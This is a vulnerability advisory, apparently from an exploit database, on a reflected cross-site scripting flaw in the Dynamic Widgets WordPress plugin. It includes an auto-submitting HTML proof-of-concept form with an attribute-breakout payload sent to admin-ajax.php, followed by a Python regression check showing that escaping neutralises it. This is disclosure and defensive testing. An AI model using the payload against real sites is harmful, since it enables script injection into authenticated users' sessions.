wpexploit | JrXnm | WPEX-ID:B8E6F0D3-A7D1-4CA8-ABA8-0D5075167D55
Dec 28, 2021 - 12:00 a.m.

Dynamic Widgets <= 1.5.16 - Reflected Cross-Site Scripting


EPSS: 0.001 (Low), Percentile: 25.0%

The plugin does not escape the prefix parameter before outputting it back in an attribute when using the term_tree AJAX action (available to any authenticated user), leading to a Reflected Cross-Site Scripting issue.

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
      <input type="hidden" name="action" value="term_tree" />
      <input type="hidden" name="prefix" value='xxxxxx" onmouseover=alert(/XSS/) test="' />
      <input type="hidden" name="name" value="Uncategorizedory" />
      <input type="hidden" name="widget_id" value="1" />
      <input type="hidden" name="id" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>
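
The same reflection as a regression check, added here as an example (it is not the plugin's code or the advisory's): `render()` is a hypothetical stand-in for the markup the term_tree response builds, and the `id` attribute and template are assumptions. It parses the output to show that the prefix value from the proof of concept adds an `onmouseover` attribute when unescaped and stays inside one attribute value once escaped; in the plugin's PHP the corresponding call is WordPress's `esc_attr()`.

```python
from html import escape
from html.parser import HTMLParser

# "prefix" value taken from the proof-of-concept form on this page.
POC_PREFIX = 'xxxxxx" onmouseover=alert(/XSS/) test="'

# Constructed probes: an inert tag breakout and a benign prefix.
EXTRA_PROBES = ['a"><b>', "plain_prefix-"]


def render(prefix, term_id, escaped):
    """Hypothetical response markup: prefix is reflected into an id attribute."""
    value = f"{prefix}{term_id}"
    if escaped:
        value = escape(value, quote=True)  # encodes & < > " '
    return f'<input type="checkbox" id="{value}" />'


class _StartTags(HTMLParser):
    """Collects (tag, attributes) for every start tag the parser recognises."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, dict(attrs)))


def parse(markup):
    parser = _StartTags()
    parser.feed(markup)
    parser.close()
    return parser.seen


def leaked(markup, expected_id):
    """True unless the markup is exactly one <input> carrying only type and id."""
    return parse(markup) != [("input", {"type": "checkbox", "id": expected_id})]


def failing_probes(escaped):
    """Probes whose reflected value changes the structure of the element."""
    probes = [POC_PREFIX] + EXTRA_PROBES
    return [p for p in probes if leaked(render(p, "2", escaped), p + "2")]


if __name__ == "__main__":
    print("unescaped:", failing_probes(escaped=False))
    print("escaped:  ", failing_probes(escaped=True))
```

The check is structural rather than pattern-based, so it flags any reflected value that adds an attribute or element, not only ones containing a known handler name.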
